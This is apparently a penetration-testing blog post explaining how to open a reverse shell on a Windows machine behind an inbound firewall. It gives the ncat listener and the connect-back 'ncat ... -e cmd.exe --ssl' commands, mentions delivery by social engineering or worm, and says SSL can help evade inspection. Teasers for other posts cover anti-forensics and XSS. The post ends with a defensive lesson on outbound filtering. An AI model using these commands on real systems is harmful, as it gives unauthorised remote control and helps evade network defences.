Reverse Shell with Ncat

Kali Linux is the defacto for pen testing. While any linux distro (or OS) can work for backdooring into networks, its quickest to just download a Kali Linux iso. It comes with most of the pen testing tools (some of them cost money but most are free) to get you up and running:

Lets not waste time, we have a windows machine to administer (or connect to for nefarious purposes). Let's say the windows machine is behind a firewall with all inbound connections blocked as shown below:
This will prevent us from doing a bind shell with windows, but not a reverse shell. To create a reverse shell, let's have our kali linux machine listen on an unused well known port, 443:

 ncat -lvp 443 --ssl

The -lvp command means listen verbosely on port 443. --ssl will encrypt all incoming traffic (note ssl is deprecated as of ncat 7.6. To use this option, ncat 7.5 should be installed). By encrypting our traffic, it will make it difficult, albeit not impossible, to eavesdrop on our connection. It will also allow us to possibly bypass some firewall deep packet inspection filters too.

Now let's have our target machine connect to kali linux. If we run the command ifconfig on Kali, we can obtain our IPv4 address. The payload, whether it be through social engineering tactics, a worm, excreta, would execute a windows shell. This can be done with the -e command followed by the shell executable:

 ncat -nv <IPv4 Addr> 443 -e cmd.exe --ssl

The -nv followed by the IPv4 address says to connect to port 443 without resolving hostnames via dns. -e will then execute the windows command prompt and --ssl completes the ssl encryption.

At this point, the kali linux machine should have a connection to the windows machine and should be able to execute windows commands. 

Lesson learned:
Outbound traffic can be just as malicious as inbound traffic. From a systems administrator standpoint it is important to keep this in mind when setting up Firewall rules. Take time to create bind and reverse shells, and check out the link below for a deeper description:

Comments

Post a Comment

Popular posts from this blog

Covering Your Tracks

The ability to remain stealth during a penetration exercise is what separates a sophisticated hacker from a script kitty. The phrase “The Quieter You Become, The More You Are Able to Hear” holds true, especially in the field of hacking. Being able to perform Ani-forensics and avoid detection is critical to the success of hacking and penetration testing and understanding these methods is beneficial, even for white hat hackers, as there will be times in a penetration where the system is already compromised. In such cases, understanding what the attacker is doing in order to cover their tracks can help determine the sophistication of the attack or bring prosecution to the attacker. All hacks begin with system enumeration and nmap is one of the best tools to use during this discovery phase. However, as I explained in Scanning With nmap blog, port scanning a bunch of IP Addresses or every port on a target system is noisy and can cause denial of service conditions (very bad if you are
Read more

Covering Your Tracks - Anti-forensics for the Cloud - Introduction

Image
Before delving into cloud forensics there are some concepts that need to be explained. The cloud consisted of two entities, provider (companies that host cloud technologies) and tenants (companies that use cloud technologies from the providers). The cloud generally consists of three service models:  Infrastructure-as-a-Service (IaaS) where the provider provides the hardware and network. Platform-as-a-Service (PaaS) where the provider provides all the components to a tenant's application. Software-as-a-Service (SaaS) where the provider supplies the software and the components to run it and the tenant uses and at most configures the application. Chris Brenton gives a great overview of the cloud and the challenges it poses in the link below: https://www.sans.org/blog/pen-testing-in-the-cloud/ Surprisingly there is not a lot of coverage out on the web for cloud forensics and this makes sense. Cloud forensics analysts, especially for tenants, may be somewhat limited on acc
Read more

Cross-Site Scripting (XSS) Introduction

Image
  Cross-Site Scripting (XSS) Introduction Note** The following examples utilize Web for Penetration Testers which I do not own any rights to. These examples provide solutions to the live image of Web for Pentester 1 which can be downloaded at https://pentesterlab.com/exercises/web_for_pentester/course . Please attempt these exercises on your own before reviewing my solutions to gain maximum benefit.   Introduction XSS is an often-overlooked vulnerability. The generic “Hello World” example of XSS (e.g. <script>alert(“XSS”);</script>) is an overly benign example. Once an XSS vulnerability is discovered it becomes possible for attackers to modify the webpage to re-direct users to malicious site, steal a user’s session or cookie, or bypass a log in. Because XSS is such a huge topic, a series will be developed with exploitations to follow. For this blog article, XSS detection will be focused on. Eventually this series will cover JSON, XML, XPath, JQuery, and other typ
Read more